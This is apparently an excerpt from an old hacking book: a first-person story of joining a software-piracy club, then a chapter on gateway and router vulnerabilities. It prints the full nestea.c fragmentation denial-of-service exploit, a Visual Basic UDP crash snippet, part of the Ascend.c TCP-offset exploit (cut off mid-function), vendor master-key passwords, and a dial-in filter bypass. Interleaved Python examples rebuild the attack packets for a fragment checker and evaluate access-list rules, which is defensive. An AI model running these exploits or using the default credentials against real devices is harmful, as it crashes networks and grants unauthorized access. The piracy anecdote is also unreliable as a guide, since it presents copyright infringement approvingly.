A Hacker's Vocation
As I stood there pondering my newfound potential source of goodies, I realized I was a bit confused: The letter stated that there were a few prerequisites before I would be considered a tyro member. First and foremost, I had to draft a few paragraphs as an autobiography, including my expectations of, and prospective personal offerings to, the group. Second, I had to include a list of software, hardware, and technologies in which I considered myself skilled. The third requirement mandated a complete listing of all software and hardware in my current possession. Last, I was required to make copies of this information and mail them to the names on a list that was included on an enclosed diskette. I was especially excited to see that list. I wondered: Was it a member list? How many computer enthusiasts, like myself, could there be? I immediately popped the disk in my system and executed the file, runme.com. Upon execution, the program produced an acceptance statement, which I skimmed, and quickly clicked on Agreed. Next I was instructed to configure my printer for mailing labels. This I was happy to do since I had just purchased a batch of labels and couldn't wait to print some out. To my surprise, however, my printer kept printing and printing until I had to literally run to the store and buy some more, and then again—five packets of 50 in all. Then I had to buy 265 stamps. I couldn't believe the group had more than 260 members: How long ago had this group been established? I was eager to find out, so I mailed my requirements the very next morning. The day after, as I walked back from the post office, I thought I should make a copy of my membership disk; it did have important contacts within. But when I arrived home and loaded the diskette, the runme.com file seemed to have been deleted. (Later I discovered a few hidden files that solved that mystery.) The list was gone, so I waited.
Patience is a virtue—at least that's what I was brought up to believe. And, in this case it paid off. It wasn't long before I received my first reply as a new member of this computer club. The new package included another mailing list—different from the first one and much smaller. There was also a welcome letter and a huge list of software programs. The latter half of the welcome note included some final obligatory instructions. My first directive was to choose a handle, a nickname by which I would be referred to in all correspondence with the club. I chose Ponyboy, my nickname in a neighborhood group I had belonged to some years back. The next objective was twofold: First I had to send five of the programs from my submission listing to an enclosed address. In return, as the second part of the objective, I was to choose five programs I wanted from the list enclosed with the welcome letter. I didn't have a problem sending my software (complete original disks, manuals, and packaging) as I was looking forward to receiving new replacements.
Approximately a week and a half passed before I received a response. I was surprised that it was much smaller than the one I had mailed—there was no way my selections could fit in a parcel that small. My initial suspicion was that I had been swindled, but when I opened the package, I immediately noticed three single-sided diskettes with labels and cryptic handwriting on both sides. It took a moment for me to decipher the scribble to recognize the names of computer programs that I had requested, plus what appeared to be extra software, on the second side of the third diskette. Those bonus programs read simply: hack-005. This diskette aroused my curiosity as never before. I cannot recall powering on my system and scanning a diskette so quickly before or since.
The software contained Underground disk copy programs, batches of hacking text files, and file editors from ASCII to HEX. One file included instructions on pirating commercial software, another on how to convert single-sided diskettes into using both sides (that explained the labels on both sides of what would normally have been single-sided floppies). And there was more: files on hacking system passwords and bypassing CMOS and BIOS instructions. There was a very long list of phone numbers and access codes to hacker bulletin boards in almost every state. There was also information on secret meetings that were to take place in my area. I felt like a kid given free rein in a candy store. In retrospect, I believe that was the moment when I embarked on a new vocation: as a hacker.
Gateways and Routers and Internet Server Daemons
The port, socket, and service vulnerability penetrations detailed in Chapter 8 can more or less be applied to any section in this part of the book, as they were chosen because they are among the most common threats to a specific target. Using examples throughout the three chapters that comprise this part, we'll also examine specifically selected exploits, those you may already be aware of and many you probably won't have seen until now. Together, they provide important information that will help to solidify your technology foundation. And all the source code, consisting of MS Visual Basic, C, and Perl snippets, can be modified for individual assessments.
In this chapter, we cover gateways and routers and Internet server daemons. In Chapter 10, we cover operating systems, and in Chapter 11, proxies and firewalls.
Without written consent from the target company, most of these procedures are illegal in the United States and many other countries. Neither the author nor the publisher will be held accountable for the use or misuse of the information contained in this book.
Gateways and Routers
Fundamentally, a gateway is a network point that acts as a doorway between multiple networks. In a company network, for example, a proxy server may act as a gateway between the internal network and the Internet. By the same token, an SMTP gateway lets users on the network exchange e-mail with the outside world. Gateways interconnect networks and are categorized according to the OSI layer at which they operate: repeaters at the Physical Layer (1), bridges at the Data Link Layer (2), routers at the Network Layer (3), and so on. This section describes vulnerability hacking secrets for common gateways that function primarily as access routers, operating at Network Layer 3.
A router that connects any number of LANs or WANs uses information from protocol headers to build a routing table and forwards packets according to the decisions compiled in that table. Routing hardware design is relatively straightforward: network interfaces, an administration or console port, and often an auxiliary port for out-of-band management devices such as modems. As packets arrive on a router's network interface, they are placed in a queue for processing. The router builds, updates, and maintains its routing tables while concurrently inspecting each packet header to decide the next step: accept and forward the packet according to the routing policy, or discard it according to the filtering policy. At the same time, protocol functions provide handshaking, windowing, buffering, source quenching, and error checking.
The gateways described here also involve various terminal server, transport, and application gateway services. These Underground vulnerability secrets cover approximately 90 percent of the gateways in use today, including those of 3Com, Ascend, Cabletron, Cisco, Intel, and Nortel/Bay.
3Com
3Com (www.3com.com) has been offering technology products for over two decades. With more than 300 million users worldwide, it's no wonder 3Com is among the 100 largest companies on the Nasdaq. Relevant to this section, the company offers access products that range from small-office connectivity with the OfficeConnect family of products, to high-performance LAN/WAN availability, including VPN tunneling and security applications. Each solution is designed to build medium-enterprise secure remote access, intranets, and extranets. These products integrate WAN technologies such as Frame Relay, xDSL, ISDN, leased lines, and multiprotocol LAN-to-LAN connections. The OfficeConnect product line targets small to medium-sized businesses, typically providing remote-location connectivity as well as Internet access. On the other end of the spectrum, the SuperStack II and Total Control product series provide medium to large enterprises and ISPs with secure, reliable connections to branch offices, the Internet, and access points for mobile users.
Liabilities
HiPer ARC Card Denial-of-Service Attack
Synopsis: 3Com HiPer ARC cards are vulnerable to the nestea and 1234 denial-of-service (DoS) attacks.
Hack State: System crash.
Vulnerabilities: HiPer ARC cards running system version 4.1.11/x.
Breach: 3Com HiPer ARC cards running system version 4.1.11 are vulnerable to certain DoS attacks that cause the card to crash and reboot. Note that 3Com/USR IP stacks have historically not been resistant to specific kinds of fragmentation DoS attacks, such as variations of nestea.c (originally by humble of rhino9), shown here:
Nestea.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <time.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* bsd usage works now, the original nestea.c was broken, because some
   braindead linsux-c0d3r was too stupid to use sendto() correctly */

/* Define STRANGE_LINSUX_BYTE_ORDERING_THING when building on Linux: Linux raw
   sockets want the IP length and fragment-offset fields in network byte order,
   the older BSDs want them in host byte order. */
#ifndef STRANGE_LINSUX_BYTE_ORDERING_THING
/* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
#define FIX(n)  (n)
#else /* OpenBSD 2.1, all Linux */
#define FIX(n)  htons(n)
#endif /* STRANGE_LINSUX_BYTE_ORDERING_THING */

#define IP_MF   0x2000  /* More IP fragment en route */
#define IPH     0x14    /* IP header size */
#define UDPH    0x8     /* UDP header size */
#define MAGIC2  108
#define PADDING 256     /* datagram frame padding for first packet */
#define COUNT   500     /* we are overwriting a small number of bytes we
                           shouldnt have access to in the kernel.
                           to be safe, we should hit them till they die :) */

void usage(char *);
u_long name_resolve(char *);
u_short in_cksum(u_short *, int);
void send_frags(int, u_long, u_long, u_short, u_short);

int main(int argc, char **argv)
{
    int one = 1, count = 0, i, rip_sock;
    u_long  src_ip = 0, dst_ip = 0;
    u_short src_prt = 0, dst_prt = 0;
    struct in_addr addr;

    if ((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
    {
        perror("raw socket");
        exit(1);
    }

    /* we build the IP header ourselves */
    if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one))
        < 0)
    {
        perror("IP_HDRINCL");
        exit(1);
    }

    if (argc < 3) usage(argv[0]);

    if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2])))
    {
        fprintf(stderr, "What the hell kind of IP address is that?\n");
        exit(1);
    }

    while ((i = getopt(argc, argv, "s:t:n:")) != EOF)
    {
        switch (i)
        {
            case 's':           /* source port (should be emphemeral) */
                src_prt = (u_short)atoi(optarg);
                break;
            case 't':           /* dest port (DNS, anyone?) */
                dst_prt = (u_short)atoi(optarg);
                break;
            case 'n':           /* number to send */
                count   = atoi(optarg);
                break;
            default :
                usage(argv[0]);
                break;          /* NOTREACHED */
        }
    }
    srandom((unsigned)(time((time_t)0)));
    if (!src_prt) src_prt = (random() % 0xffff);
    if (!dst_prt) dst_prt = (random() % 0xffff);
    if (!count)   count   = COUNT;

    fprintf(stderr, "Nestea by humble\nCode ripped from teardrop by route / daemon9\n");
    fprintf(stderr, "Death on flaxen wings (yet again):\n");
    addr.s_addr = src_ip;
    fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt);
    addr.s_addr = dst_ip;
    fprintf(stderr, "  To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
    fprintf(stderr, " Amt: %5d\n", count);
    fprintf(stderr, "[ ");

    for (i = 0; i < count; i++)
    {
        send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
        fprintf(stderr, "bOOm ");
        usleep(500);
    }
    fprintf(stderr, "]\n");
    return (0);
}

/* Sends the three fragments that make up one attack: a small first fragment,
   a second one at offset 6, and a third with a 60-byte IP header that overlaps
   both of them. */
void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
                u_short dst_prt)
{
    int i;
    u_char *packet = NULL, *p_ptr = NULL;   /* packet pointers */
    u_char byte;                            /* a byte */
    struct sockaddr_in sin;                 /* socket protocol structure */

    sin.sin_family      = AF_INET;
    sin.sin_port        = src_prt;          /* unused for raw sends, as in the original */
    sin.sin_addr.s_addr = dst_ip;

    packet = (u_char *)malloc(IPH + UDPH + PADDING + 40);
    p_ptr  = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING);

    /* fragment 1: offset 0, MF set, 10 bytes of UDP payload */
    byte = 0x45;                            /* IP version and header length */
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2;                             /* IP TOS (skipped) */
    *((u_short *)p_ptr) = FIX(IPH + UDPH + 10);     /* total length */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242);       /* IP id */
    p_ptr += 2;
    *((u_short *)p_ptr) |= FIX(IP_MF);      /* IP frag flags and offset */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40;             /* IP TTL */
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    p_ptr += 4;                             /* IP checksum filled in by kernel */
    *((u_long *)p_ptr) = src_ip;            /* IP source address */
    p_ptr += 4;
    *((u_long *)p_ptr) = dst_ip;            /* IP destination address */
    p_ptr += 4;
    *((u_short *)p_ptr) = htons(src_prt);   /* UDP source port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt);   /* UDP destination port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(8 + 10);    /* UDP total length */

    if (sendto(sock, packet, IPH + UDPH + 10, 0, (struct sockaddr *)&sin,
               sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }

    /* fragment 2: offset 6 (48 bytes), MF clear, MAGIC2 bytes of payload */
    p_ptr = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING);
    byte = 0x45;                            /* IP version and header length */
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2;                             /* IP TOS (skipped) */
    *((u_short *)p_ptr) = FIX(IPH + UDPH + MAGIC2); /* total length */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242);       /* IP id */
    p_ptr += 2;
    *((u_short *)p_ptr) = FIX(6);           /* IP frag flags and offset */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40;             /* IP TTL */
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    p_ptr += 4;                             /* IP checksum filled in by kernel */
    *((u_long *)p_ptr) = src_ip;            /* IP source address */
    p_ptr += 4;
    *((u_long *)p_ptr) = dst_ip;            /* IP destination address */
    p_ptr += 4;
    *((u_short *)p_ptr) = htons(src_prt);   /* UDP source port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt);   /* UDP destination port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(8 + MAGIC2);        /* UDP total length */

    if (sendto(sock, packet, IPH + UDPH + MAGIC2, 0, (struct sockaddr *)&sin,
               sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }

    /* fragment 3: 60-byte IP header (IHL 15, 40 bytes of zeroed options),
       offset 0, MF set, PADDING bytes of random payload */
    p_ptr = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING + 40);
    byte = 0x4F;                            /* IP version and header length */
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2;                             /* IP TOS (skipped) */
    *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING + 40);   /* total length */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242);       /* IP id */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0 | FIX(IP_MF);   /* IP frag flags and offset */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40;             /* IP TTL */
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    p_ptr += 4;                             /* IP checksum filled in by kernel */
    *((u_long *)p_ptr) = src_ip;            /* IP source address */
    p_ptr += 4;
    *((u_long *)p_ptr) = dst_ip;            /* IP destination address */
    p_ptr += 44;                            /* skip the 40 option bytes */
    *((u_short *)p_ptr) = htons(src_prt);   /* UDP source port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt);   /* UDP destination port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(8 + PADDING);       /* UDP total length */

    for (i = 0; i < PADDING;)
    {
        p_ptr[i++] = random() % 255;
    }

    if (sendto(sock, packet, IPH + UDPH + PADDING + 40, 0, (struct sockaddr *)&sin,
               sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }
    free(packet);
}

/* dotted quad or host name to a network-order address, 0 on failure */
u_long name_resolve(char *host_name)
{
    struct in_addr addr;
    struct hostent *host_ent;

    if ((addr.s_addr = inet_addr(host_name)) == -1)
    {
        if (!(host_ent = gethostbyname(host_name))) return (0);
        bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
    }
    return (addr.s_addr);
}

void usage(char *name)
{
    fprintf(stderr,
            "%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n",
            name);
    exit(0);
}
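The three datagrams that send_frags() emits, rebuilt in Python and run through the kind of fragment sanity check a reassembler or IDS preprocessor should apply. This is an added example, not code from the book, from nestea.c, or from 3Com: the fragment geometry (IP id 242, a 10-byte first fragment, a second fragment at offset 6 carrying 108 bytes, a third with a 60-byte header and 256 bytes of padding) is taken from the listing above, while the addresses, ports, and the clean UDP header on the third fragment are constructed test values. The same check covers the NetServer 8/16 and PalmPilot Pro entries later in this section, which cite the same tool.

```python
import struct

IP_MF = 0x2000                  # "more fragments" flag, as in nestea.c
IPH, UDPH = 20, 8               # minimal IP and UDP header sizes
MAGIC2, PADDING = 108, 256      # nestea.c constants
IPPROTO_UDP = 17


def ipv4_header(ihl_words, total_len, ident, flags_off, ttl, proto, src, dst, options=b""):
    """Raw IPv4 header with the checksum left at 0 (nestea.c lets the kernel fill it).
    src/dst are 4-byte network-order addresses; options pads the header to ihl_words*4."""
    assert len(options) == (ihl_words - 5) * 4
    return struct.pack("!BBHHHBBH4s4s", (4 << 4) | ihl_words, 0, total_len,
                       ident, flags_off, ttl, proto, 0, src, dst) + options


def udp_header(sport, dport, length):
    """UDP header with a zero (unused) checksum."""
    return struct.pack("!HHHH", sport, dport, length, 0)


def nestea_fragments(src, dst, sport, dport):
    """The three datagrams send_frags() sends, in order, as bytes on the wire."""
    # 1: offset 0, MF set, 10 bytes of payload: 18 bytes of data after the header
    f1 = (ipv4_header(5, IPH + UDPH + 10, 242, IP_MF, 0x40, IPPROTO_UDP, src, dst)
          + udp_header(sport, dport, 8 + 10) + bytes(10))
    # 2: offset 6 (48 bytes), MF clear, 108 bytes of payload
    f2 = (ipv4_header(5, IPH + UDPH + MAGIC2, 242, 6, 0x40, IPPROTO_UDP, src, dst)
          + udp_header(sport, dport, 8 + MAGIC2) + bytes(MAGIC2))
    # 3: IHL 15 (a 60-byte header carrying 40 bytes of options), offset 0, MF set,
    #    256 bytes of padding (random in nestea.c; zeros here, the geometry is what matters)
    f3 = (ipv4_header(15, IPH + UDPH + PADDING + 40, 242, IP_MF, 0x40, IPPROTO_UDP,
                      src, dst, bytes(40))
          + udp_header(sport, dport, 8 + PADDING) + bytes(PADDING))
    return [f1, f2, f3]


def parse_ipv4(pkt):
    """(header length, total length, id, MF flag, fragment offset in bytes, protocol)."""
    vihl, _tos, tot, ident, flags_off, _ttl, proto = struct.unpack("!BBHHHBB", pkt[:10])
    return (vihl & 0x0F) * 4, tot, ident, bool(flags_off & IP_MF), (flags_off & 0x1FFF) * 8, proto


def check_fragments(frags):
    """Checks to apply to the fragments of one datagram (the caller groups them by
    source, destination, id and protocol): length fields must agree with the wire,
    a non-final fragment must carry a multiple of 8 data bytes, IP options on a
    fragment are suspicious, and data ranges must not overlap. Returns the list of
    findings; an empty list means the set looks sane."""
    findings, ranges = [], []
    for n, pkt in enumerate(frags, 1):
        ihl, tot, _ident, mf, off, _proto = parse_ipv4(pkt)
        if tot != len(pkt):
            findings.append(f"frag{n}: total length {tot} != {len(pkt)} bytes on the wire")
        data_len = tot - ihl
        if mf and data_len % 8:
            findings.append(f"frag{n}: MF set but data length {data_len} is not a multiple of 8")
        if ihl > IPH:
            findings.append(f"frag{n}: {ihl - IPH} bytes of IP options on a fragment")
        start, end = off, off + data_len
        for m, s, e in ranges:
            if start < e and s < end:
                findings.append(f"frag{n}: data {start}-{end} overlaps frag{m} ({s}-{e})")
        ranges.append((n, start, end))
    return findings


if __name__ == "__main__":
    # constructed test addresses and ports
    frags = nestea_fragments(b"\x0a\x00\x00\x01", b"\x0a\x00\x00\x02", 1025, 53)
    for finding in check_fragments(frags):
        print(finding)
```

Run against the nestea set, the check reports four findings: the first fragment is non-final yet carries 18 data bytes, the third fragment carries 40 bytes of options, and the third fragment's 0-264 byte range overlaps both earlier fragments. A well-formed pair (an 8-aligned first fragment followed by a final one that starts where it ends) produces none, which is the property a reassembler should insist on before touching kernel buffers.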
HiPer ARC Card Login
Synopsis: The HiPer ARC card establishes a potential weakness with the default adm account.
Hack State: Unauthorized access.
Vulnerabilities: HiPer ARC card v4.1.x revisions.
Breach: The software that 3Com has developed for the HiPer ARC card (v4.1.x revisions) poses a potential security threat. After the software is uploaded, a login account called adm exists with no password. Security policy naturally dictates deleting the default adm login from the configuration; however, once the unit has been configured, the settings must be saved and the box reset, at which point the adm login (still requiring no password) remains active and cannot be deleted.
Filtering
Synopsis: Filtering with dial-in connectivity is not effective: a user can dial in, receive a "host" prompt, and type in any hostname without going through the normal authentication procedures. The system logs then report that the connection was denied even though it was established.
Hack State: Unauthorized access.
Vulnerabilities: Systems with the Total Control NETServer Card V.34/ISDN with Frame Relay V3.7.24. AIX 3.2.
Breach: The Total Control chassis is common in terminal-server deployments, so when someone dials in to an ISP, he or she may well be dialing in to one of these servers. The breach pertains to ports that respond with a "host:" or similar prompt: when a port is set to "set host prompt," the access filters are commonly ignored. Consider the following filter:
sho filter allowedhosts
permit XXX.XXX.XXX.12/24 XXX.XXX.XXX.161/32 tcp dst eq 539
permit XXX.XXX.XXX.12/24 XXX.XXX.XXX.165/32 tcp dst eq 23
permit XXX.XXX.XXX.12/24 XXX.XXX.XXX.106/32 tcp dst eq 23
permit XXX.XXX.XXX.12/24 XXX.XXX.XXX.168/32 tcp dst eq 540
permit XXX.XXX.XXX.12/24 XXX.XXX.XXX.168/32 tcp dst eq 23
permit XXX.XXX.XXX.12/24 XXX.XXX.XXX.109/32 tcp dst eq 3030
permit XXX.XXX.XXX.12/24 XXX.XXX.XXX.109/32 tcp dst eq 3031
permit XXX.XXX.XXX.12/24 XXX.XXX.XXX.109/32 tcp dst eq 513
deny 0.0.0.0/0 0.0.0.0/0 ip
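To make explicit what that filter is supposed to enforce (and therefore exactly what the "set host prompt" bypass skips), here is a small evaluator for the rule format listed above. It is an added example written for this edition, not code from the book or from 3Com. The 192.0.2.0/24 addresses stand in for the XXX.XXX.XXX values the listing redacts, and the evaluation order (first matching rule wins, implicit deny if nothing matches) is the usual access-list semantics assumed here rather than something the chapter states.

```python
import ipaddress
from typing import NamedTuple, Optional


class Rule(NamedTuple):
    action: str                      # "permit" or "deny"
    src: ipaddress.IPv4Network
    dst: ipaddress.IPv4Network
    proto: str                       # "tcp", "udp" or "ip" (any)
    dport: Optional[int]             # "dst eq N" clause, or None


def parse_filter(text):
    """Parse 'sho filter' output into Rule objects; non-rule lines are skipped."""
    rules = []
    for line in text.strip().splitlines():
        parts = line.split()
        if not parts or parts[0] not in ("permit", "deny"):
            continue
        action, src, dst, proto = parts[:4]
        dport = None
        if len(parts) >= 7 and parts[4] == "dst" and parts[5] == "eq":
            dport = int(parts[6])
        # strict=False turns 192.0.2.12/24 into 192.0.2.0/24, as the router does
        rules.append(Rule(action, ipaddress.ip_network(src, strict=False),
                          ipaddress.ip_network(dst, strict=False), proto, dport))
    return rules


def evaluate(rules, src, dst, proto, dport=None):
    """First matching rule wins. Returns (action, rule index); the index is None
    when no rule matched and the implicit deny applied."""
    s, d = ipaddress.ip_address(src), ipaddress.ip_address(dst)
    for i, r in enumerate(rules):
        if s not in r.src or d not in r.dst:
            continue
        if r.proto != "ip" and r.proto != proto:
            continue
        if r.dport is not None and r.dport != dport:
            continue
        return r.action, i
    return "deny", None


# Constructed stand-in for the chapter's redacted listing (192.0.2.0/24 is
# documentation address space); the rule syntax is the chapter's.
FILTER = """\
sho filter allowedhosts
permit 192.0.2.12/24 192.0.2.161/32 tcp dst eq 539
permit 192.0.2.12/24 192.0.2.165/32 tcp dst eq 23
permit 192.0.2.12/24 192.0.2.106/32 tcp dst eq 23
permit 192.0.2.12/24 192.0.2.168/32 tcp dst eq 540
permit 192.0.2.12/24 192.0.2.168/32 tcp dst eq 23
permit 192.0.2.12/24 192.0.2.109/32 tcp dst eq 3030
permit 192.0.2.12/24 192.0.2.109/32 tcp dst eq 3031
permit 192.0.2.12/24 192.0.2.109/32 tcp dst eq 513
deny 0.0.0.0/0 0.0.0.0/0 ip
"""
RULES = parse_filter(FILTER)


if __name__ == "__main__":
    # a dial-in user (192.0.2.50) telnetting to an allowed host, then to one that is not
    for target in ("192.0.2.165", "192.0.2.200"):
        print(target, evaluate(RULES, "192.0.2.50", target, "tcp", 23))
```

With the filter applied, a telnet to 192.0.2.200 from a dial-in user is denied by the final catch-all rule, which is the decision the syslog entry in the text records; the bypass lies in the host prompt handing out the session without consulting the filter at all, so the logged verdict and the real outcome disagree. That mismatch is itself a useful detection signal on a terminal server: any "access denied" log line paired with an ESTABLISHED session for the same user deserves a look.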
An attacker can type a hostname twice at the "host:" pr ompt and be presented with a telnet session to the target host. At this point the hacker has gained unauthorized access, as the session listing shows:
sho ses
S19 hacker.target.system. Login In ESTABLISHED 4:30
Even though access is attained, the syslogs will typically report the following:
XXXXXX remote_access: Packet filter does not exist. User hacker... access denied.
Master Key Passwords
Synopsis: Certain 3Com switches open a doorway to hackers due to a number of "master key" passwords that have been distributed on the Internet.
Hack State: Unauthorized access to configurations.
Vulnerabilities: The CoreBuilder 2500, 3500, 6000, and 7000, or SuperStack II switch 2200, 2700, 3500, and 9300 are all affected.
Breach: According to 3Com, the master key passwords were "accidentally found" by an Internet user and then published by hackers of the Underground. Evidently, 3Com engineers keep the passwords for use during emergencies, such as password loss.
CoreBuilder 6000/2500 username: debug password: synnet
CoreBuilder 7000 username: tech password: tech
SuperStack II Switch 2200 username: debug password: synnet
SuperStack II Switch 2700 username: tech password: tech
The CoreBuilder 3500 and SuperStack II Switch 3900 and 9300 also have these mechanisms, but the special login password is changed to match the admin-level password when the password is modified.
NetServer 8/16 DoS Attack
Synopsis: NetServer 8/16 vulnerable to the nestea DoS attack.
Hack State: System crash.
Vulnerabilities: The NetServer 8/16 V.34, O/S version 2.0.14.
Breach: The NetServer 8/16 is also vulnerable to the Nestea.c DoS attack (shown previously).
PalmPilot Pro DoS Attack
Synopsis: PalmPilot Pro vulnerable to the nestea DoS attack.
Hack State: System crash.
Vulnerabilities: The PalmPilot Pro, O/S version 2.0.x.
Breach: 3Com's PalmPilot Pro running system version 2.0.x is vulnerable to the nestea.c DoS attack, which crashes the device and requires a reboot.
The source code in this chapter can be found on the CD bundled with this book.
Ascend/Lucent
The Ascend (www.ascend.com) remote-access products offer open WAN-to-LAN access and security features all packed in single units. These products are considered ideal for organizations that need to maintain a tightly protected LAN for internal data transactions, while permitting outside free access to Web servers, FTP sites, and such. These products commonly target small to medium business gateways and enterprise branch-to-corporate access entry points. Since the merger of Lucent Technologies (www.lucent.com) with Ascend Communications, the data networking product line is much broader and more powerful and reliable.
Liabilities
Distorted UDP Attack
Synopsis: A flaw in the Ascend router internetworking operating system allows the machines to be crashed by certain malformed UDP packets.
Figure 9.1 Successful penetration with the TigerBreach Penetrator.
Hack State: System crash.
Vulnerabilities: Ascend Pipeline and MAX products.
Breach: Ascend configurations can be modified via a graphical configurator, which locates Ascend routers on a network with a special UDP packet: the routers listen for broadcasts (a unique UDP packet sent to the "discard" port, 9) and respond with another UDP packet that contains the name of the router. By sending a specially malformed UDP packet to the discard port of an Ascend router, an attacker can cause the router to crash. During a security analysis, you can use TigerBreach Penetrator to verify connectivity and test for this flaw (see Figure 9.1).
An example of a program that can be modified for UDP packet transmission is shown here (Figure 9.2 shows the corresponding forms). The Winsock control (Socket1) and the two text boxes (txtIP, txtName) are placed on the form in the designer and are not shown in the listing.
Crash.bas
Option Explicit

Private Sub Crash()
    ' Socket1 is a Winsock control in UDP mode; txtIP holds the target address
    Socket1.RemoteHost = txtIP.Text
    Socket1.SendData txtName.Text + "Crash!!!"
End Sub
Synopsis: Repeated remote telnet login attempts can exhaust the Ascend router's session limit and cause the system to refuse further attempts.
Hack State: Severe congestion.
Vulnerabilities: Ascend Pipeline products.
Breach: Continuous remote telnet authentication attempts can max out system session limits, causing the router to refuse legitimate sessions.
MAX Attack
Synopsis: Attackers have been able to remotely reboot Ascend MAX units by telnetting to port 150 while sending TCP packets with a nonzero-length TCP offset, using the TCP offset code (Ascend.c) shown later in this section.
Hack State: System restart.
Vulnerabilities: Ascend MAX 5x products.
TCP Offset Harassment
Synopsis: A hacker can crash an Ascend terminal server by sending a packet with a nonzero-length TCP offset.
Hack State: System crash.
Vulnerabilities: Ascend terminal servers.
Breach: Ascend.c (originally by The Posse).
Ascend.c
/* Ascend.c (originally by The Posse).  The TCP checksum routine was x86
 * inline assembly in the original listing; it is rewritten here in portable
 * C that computes the same RFC 793 pseudo-header checksum. */
#define __FAVOR_BSD 1                   /* BSD-style struct tcphdr names (th_*) */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <time.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>

/* one's-complement sum of len bytes at p, taken as big-endian 16-bit words */
static unsigned long
sum_words (const unsigned char *p, int len, unsigned long sum)
{
  while (len > 1)
    {
      sum += ((unsigned long) p[0] << 8) | p[1];
      p += 2;
      len -= 2;
    }
  if (len)                              /* odd trailing byte, padded with zero */
    sum += (unsigned long) p[0] << 8;
  return sum;
}

/* TCP checksum over the pseudo header (src, dst, zero, protocol, TCP length)
   followed by the TCP header and data.  Addresses are in network byte order,
   len in host byte order; the result is ready to store into th_sum. */
unsigned short
compute_tcp_checksum (struct tcphdr *th, int len,
                      unsigned long saddr, unsigned long daddr)
{
  struct
  {
    u_int32_t src, dst;
    u_int8_t zero, proto;
    u_int16_t len;
  } ph;
  unsigned long sum;

  ph.src = (u_int32_t) saddr;
  ph.dst = (u_int32_t) daddr;
  ph.zero = 0;
  ph.proto = IPPROTO_TCP;
  ph.len = htons ((u_int16_t) len);
  sum = sum_words ((const unsigned char *) &ph, sizeof (ph), 0);
  sum = sum_words ((const unsigned char *) th, len, sum);
  while (sum >> 16)
    sum = (sum & 0xffff) + (sum >> 16);
  return htons ((unsigned short) (~sum & 0xffff));
}

#define psize        (sizeof (struct iphdr) + sizeof (struct tcphdr))
#define tcp_offset   (sizeof (struct iphdr))
#define err(x)       { fprintf (stderr, "%s", x); exit (1); }
#define errors(x, y) { fprintf (stderr, x, y); exit (1); }

struct iphdr temp_ip;
int temp_socket = 0;
struct sockaddr_in local, remote;       /* used by main(); declared globally */
u_long start_seq = 0;

/* standard IP header checksum over nwords 16-bit words */
u_short
ip_checksum (u_short * buf, int nwords)
{
  unsigned long sum;

  for (sum = 0; nwords > 0; nwords--)
    sum += *buf++;
  sum = (sum >> 16) + (sum & 0xffff);
  sum += (sum >> 16);
  return ~sum;
}

/* fill addr with the address for hostname (dotted quad or DNS name) */
void
fixhost (struct sockaddr_in *addr, char *hostname)
{
  struct sockaddr_in *address;
  struct hostent *host;

  address = (struct sockaddr_in *) addr;
  (void) bzero ((char *) address, sizeof (struct sockaddr_in));
  address->sin_family = AF_INET;
  address->sin_addr.s_addr = inet_addr (hostname);
  if ((int) address->sin_addr.s_addr == -1)
    {
      host = gethostbyname (hostname);
      if (host)
        {
          bcopy (host->h_addr, (char *) &address->sin_addr, host->h_length);
        }
      else
        {
          puts ("Couldn't resolve address!!!");
          exit (-1);
        }
    }
}

/* resolve host to a network-order address, 0 on failure */
unsigned int
lookup (char *host)
{
  unsigned int addr;
  struct hostent *he;

  addr = inet_addr (host);
  if (addr == -1)
    {
      he = gethostbyname (host);
      if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL))
        return 0;
      /* the original copied sizeof (he->h_addr_list), the size of a pointer */
      bcopy (he->h_addr_list[0], &addr, sizeof (addr));
    }
